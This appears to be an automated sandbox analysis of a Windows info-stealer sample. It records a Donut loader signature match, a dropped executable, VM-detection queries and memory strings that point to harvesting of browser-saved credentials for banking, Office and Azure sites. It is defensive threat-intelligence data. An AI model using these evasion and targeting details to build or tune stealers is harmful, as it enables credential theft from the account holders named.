              Source: yTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/re
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49860 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49876 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.7:49883 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.7:49897 version: TLS 1.2

              System Summary

              barindex
              Source: 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E4C8C1_3_006E4C8C
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E4C8C1_3_006E4C8C
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E4C8C1_3_006E4C8C
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E4C8C1_3_006E4C8C
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_033A097B1_3_033A097B
              Source: yTRd6nkLWV.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: yTRd6nkLWV.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: yTRd6nkLWV.exe, 00000001.00000003.1429756057.0000000002A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs yTRd6nkLWV.exe
              Source: yTRd6nkLWV.exe, 00000001.00000000.1325188936.0000000000531000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs yTRd6nkLWV.exe
              Source: yTRd6nkLWV.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs yTRd6nkLWV.exe
              Source: yTRd6nkLWV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/2@12/4
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile created: C:\Users\user~1\AppData\Local\Temp\0A8O8L4RV6JWV8ND8.exeJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: yTRd6nkLWV.exe, 00000001.00000003.1472746878.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471958606.00000000033C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: yTRd6nkLWV.exeVirustotal: Detection: 8%
              Source: yTRd6nkLWV.exeReversingLabs: Detection: 36%
              Source: yTRd6nkLWV.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: yTRd6nkLWV.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: yTRd6nkLWV.exeString found in binary or memory: /LoadInf=
              Source: yTRd6nkLWV.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeFile read: C:\Users\user\Desktop\yTRd6nkLWV.exeJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: yTRd6nkLWV.exeStatic PE information: certificate valid
              Source: yTRd6nkLWV.exeStatic file information: File size 1625936 > 1048576
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CA64 pushad ; retf 0067h1_3_0067CA65
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CA60 pushad ; retf 0067h1_3_0067CA61
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067C268 push 680067C2h; retn 0067h1_3_0067C26D
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CB68 push 680067CBh; retf 1_3_0067CB6D
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CB54 push eax; retf 1_3_0067CB55
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CA54 push esp; retf 0067h1_3_0067CA55
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067C254 push eax; retn 0067h1_3_0067C255
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067C250 push eax; retn 0067h1_3_0067C251
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CB50 push eax; retf 1_3_0067CB51
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CA58 push esp; retf 0067h1_3_0067CA59
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0068C2FC pushad ; ret 1_3_0068C2FD
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CAA0 pushfd ; retf 0067h1_3_0067CAA1
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_0067CA9C pushfd ; retf 0067h1_3_0067CA9D
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006C0426 push esi; iretd 1_3_006C0430
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006C1519 pushad ; iretd 1_3_006C17CD
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E324E push edi; retf 1_3_006E3261
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E1643 push ebx; retf 1_3_006E1661
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E5033 push 9701D786h; ret 1_3_006E5041
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E1631 push edi; retf 1_3_006E1641
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E37D6 push edi; iretd 1_3_006E37D8
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006EC490 push ecx; iretd 1_3_006EC491
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006B0062 pushad ; ret 1_3_006B0063
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006B0062 pushad ; ret 1_3_006B0063
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E324E push edi; retf 1_3_006E3261
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E1643 push ebx; retf 1_3_006E1661
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E5033 push 9701D786h; ret 1_3_006E5041
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E1631 push edi; retf 1_3_006E1641
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006DE8E0 push esp; retf 1_3_006DE8FA
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E37D6 push edi; iretd 1_3_006E37D8
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E00A3 push ss; retn 004Ah1_3_006E00A4
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeCode function: 1_3_006E324E push edi; retf 1_3_006E3261
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe TID: 7680Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Amcache.hve.1.drBinary or memory string: VMware
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000666000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: yTRd6nkLWV.exe, 00000001.00000003.1501934748.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWmr
              Source: Amcache.hve.1.drBinary or memory string: vmci.sys
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: Amcache.hve.1.drBinary or memory string: VMware20,1
              Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: Amcache.hve.1.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
